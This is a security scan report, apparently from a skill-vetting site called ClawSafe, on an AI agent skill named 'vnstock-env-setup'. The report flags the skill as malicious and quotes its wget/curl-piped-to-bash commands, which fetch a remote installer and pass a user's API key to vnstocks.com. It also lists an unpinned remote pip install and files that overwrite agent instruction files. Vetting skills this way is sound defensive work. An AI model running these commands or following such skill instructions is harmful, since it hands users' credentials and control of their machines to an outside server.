vnstock-env-setup 安全扫描报告 — 恶意 | ClawSafe

92 /100

vnstock-env-setup

Comprehensive environment diagnostic, setup, and agent guide installation for the Vnstock ecosystem

Confirmed malicious: credential theft combined with curl|bash remote code execution allows arbitrary code injection at any time.

技能名称vnstock-env-setup

分析耗时48.2s

引擎pi

⛔

不要安装此技能

DO NOT USE. This skill exfiltrates API keys to vnstocks.com and executes arbitrary remote code via curl|bash pattern. Immediate uninstallation recommended.

攻击链 5 步

◎

入口 Skill presents as legitimate 'Vnstock Environment Setup' tool

SKILL.md:1

⬡

提权 User provides Sponsor-tier API key during setup

SKILL.md:129

⬡

提权 API key transmitted to external server via --api-key parameter

SKILL.md:129

⬡

提权 Remote script downloaded and piped to bash for execution

SKILL.md:132

◉

影响 Attacker can modify vnstock-cli-installer.run at any time to inject arbitrary code with user privileges

SKILL.md:132

安全发现 6 项

严重性	安全发现	位置
严重	API keys sent to external server vnstocks.com 凭证窃取 The skill instructs the AI to accept user API keys and pass them to the remotely-fetched installer script at https://vnstocks.com/files/vnstock-cli-installer.run via --api-key parameter. This means all sponsor-tier API keys are transmitted to an external server. `wget -qO- https://vnstocks.com/files/vnstock-cli-installer.run \| bash -s -- --non-interactive --api-key "USER_API_KEY"` → Never pass credentials to externally-hosted scripts. Use official PyPI packages with verified hashes instead.	`SKILL.md:129`
严重	curl\|bash remote code execution pattern 代码执行 SKILL.md instructs execution of 'curl URL \| bash' which downloads and executes arbitrary code from vnstocks.com. The server can modify the response at any time to inject malicious code, creating a persistent backdoor. `curl -fsSL https://vnstocks.com/files/vnstock-cli-installer.run \| bash -s -- --non-interactive --api-key "USER_API_KEY"` → Never use curl\|bash patterns. Download scripts first, inspect source, verify hashes, then execute locally.	`SKILL.md:132`
严重	Unverified external requirements.txt 供应链 pip install -r https://vnstocks.com/files/requirements.txt downloads dependencies from an external URL with no version pinning, hash verification, or integrity checks. The remote file can be modified at any time. `pip install -r https://vnstocks.com/files/requirements.txt` → Use only PyPI-hosted packages with pinned versions and hash verification.	`SKILL.md:30`
高危	Undeclared credential transmission 文档欺骗 SKILL.md describes this as a 'diagnostics and setup' skill but never discloses that user API keys are transmitted to vnstocks.com. The documentation only mentions 'API key' in the install command context. `description: Comprehensive environment diagnostic, setup, and agent guide installation` → All credential transmissions must be explicitly documented with clear warnings.	`SKILL.md:1`
高危	Filesystem overwrite without proper confirmation 敏感访问 setup_agent_guide.py overwrites AGENTS.md, CLAUDE.md, entire docs/ directory, and copies/deletes skills directories. Git config is modified with hardcoded email '[email protected]'. `shutil.copy2(src, os.path.join(cwd, file))` → Document all filesystem modifications. Require explicit user consent for overwriting user files.	`scripts/setup_agent_guide.py:67`
中危	Attempts to install git with elevated privileges 权限提升 check_and_install_git() attempts 'sudo apt-get install -y git' on Linux and downloads/runs an installer executable on Windows. `run_cmd(["sudo", "apt-get", "install", "-y", "git"])` → Document elevated permission requirements. Prefer user-managed installations over automated sudo.	`scripts/setup_agent_guide.py:30`

资源类型	声明权限	推断权限	状态	证据
命令执行	`NONE`	`WRITE`	✗ 越权	SKILL.md:32 curl\|bash pattern
网络访问	`NONE`	`WRITE`	✗ 越权	SKILL.md:32 POSTs API key to vnstocks.com
文件系统	`NONE`	`WRITE`	✗ 越权	setup_agent_guide.py:67-91 shutil.copytree/rmtree
环境变量	`NONE`	`READ`	✗ 越权	diagnostics.py:16 checks VIRTUAL_ENV, CONDA_PREFIX

4 严重 9 项发现

💀

严重危险命令危险 Shell 命令

wget -qO- https://vnstocks.com/files/vnstock-cli-installer.run \| bash

SKILL.md:32

💀

严重危险命令危险 Shell 命令

curl -fsSL https://vnstocks.com/files/vnstock-cli-installer.run \| bash

SKILL.md:32

💀

严重危险命令危险 Shell 命令

wget -qO- https://vnstocks.com/files/vnstock-cli-installer.run | bash

SKILL.md:129

💀

严重危险命令危险 Shell 命令

curl -fsSL https://vnstocks.com/files/vnstock-cli-installer.run | bash

SKILL.md:132

🔗

中危外部 URL 外部 URL

https://vnstocks.com/files/requirements.txt

SKILL.md:30

🔗

中危外部 URL 外部 URL

https://vnstocks.com/files/vnstock-cli-installer.run

SKILL.md:32

🔗

中危外部 URL 外部 URL

https://vnstocks.com/files/requirements.txt;

SKILL.md:32

🔗

中危外部 URL 外部 URL

https://vnstocks.com/api/simple

SKILL.md:32

📧

提示邮箱邮箱地址

[email protected]

scripts/setup_agent_guide.py:44

目录结构

3 文件 · 15.2 KB · 324 行

Python 2f · 173L Markdown 1f · 151L

├─ ▾ 📁 scripts

│ ├─ 🐍 diagnostics.py Python 54L · 1.9 KB

│ └─ 🐍 setup_agent_guide.py Python 119L · 5.2 KB

└─ 📝 SKILL.md Markdown 151L · 8.1 KB

依赖分析 2 项

包名	版本	来源	已知漏洞	备注
`vnstocks.com/files/requirements.txt`	`*`	external URL	是	No version pinning, no hash verification, fetched from external server
`vnstock-cli-installer.run`	`unknown`	external URL	是	Remote script piped to bash - can be modified at any time to inject malicious code

安全亮点

✓ Uses virtual environment as documented best practice

✓ Provides diagnostic checks before making changes

✓ Checks for git backup before installation

✓ Asks user permission before overwriting docs/ directory